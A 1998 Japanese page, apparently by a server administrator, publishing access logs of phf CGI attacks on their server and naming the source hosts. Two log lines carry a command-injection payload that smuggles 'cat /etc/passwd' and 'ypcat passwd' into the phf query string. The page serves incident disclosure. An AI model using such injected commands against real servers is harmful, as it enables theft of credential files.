最近私の仕事場のサーバーに以下のphfを利用した攻撃がありました。
このような行為はおやめください。そのようなサイトは公表していきます。
また、それぞれのサイトの管理者の方は、以下のログの日時から不正使用者を特定して、ご対処願います。
特に京都産業大学からのものは、パスワードファイルの取得を狙った悪質なものです。
このような事が二度とないようにお願いいたします。
ｐｈｆを利用した攻撃については、JPCERTに防御情報があります。
その他の方法による攻撃の記録もありましたが、今回はphf攻撃に特に悪質なものがあったので、phf攻撃のみ公開します。

surf.wil.net - - [30/Aug/1998:17:59:01 +0900] "GET /cgi-bin/phf" 404 -
surf.wil.net - - [30/Aug/1998:17:59:02 +0900] "GET /cgi-bin/test-cgi" 404 -
surf.wil.net - - [30/Aug/1998:17:59:03 +0900] "GET /cgi-bin/handler" 404 -  

spunge.org - - [30/Aug/1998:22:07:59 +0900] "GET /cgi-bin/phf" 404 -
spunge.org - - [30/Aug/1998:22:08:01 +0900] "GET /cgi-bin/test-cgi" 404 -
spunge.org - - [30/Aug/1998:22:08:02 +0900] "GET /cgi-bin/handler" 404 -  

cssol001.kyoto-su.ac.jp - - [04/Sep/1998:00:29:09 +0900] "GET /cgi-bin/phf/?Qal\
ias=x%0acat%20/etc/passwd" 404 -  

cssol002.kyoto-su.ac.jp - - [04/Sep/1998:01:02:43 +0900] "GET /cgi-bin/phf/?Qal\
ias=x%0aypcat%20passwd" 404 - 

n1nja.demon.co.uk - - [05/Sep/1998:16:50:05 +0900] "GET /cgi-bin/phf" 404 -
n1nja.demon.co.uk - - [05/Sep/1998:16:50:06 +0900] "GET /cgi-bin/test-cgi" 404 \
-                   

206.20.216.71 - - [07/Sep/1998:04:06:36 +0900] "GET /cgi-bin/phf" 404 -
206.20.216.71 - - [07/Sep/1998:04:06:41 +0900] "GET /cgi-bin/test-cgi" 404 -
206.20.216.71 - - [07/Sep/1998:04:06:46 +0900] "GET /cgi-bin/handler" 404 -

ns2.singa.pore.net - - [11/Sep/1998:10:52:53 +0900] "GET /cgi-bin/phf" 404 -
ns2.singa.pore.net - - [11/Sep/1998:10:52:54 +0900] "GET /cgi-bin/test-cgi" 404\
 -
ns2.singa.pore.net - - [11/Sep/1998:10:52:55 +0900] "GET /cgi-bin/handler" 404 \
-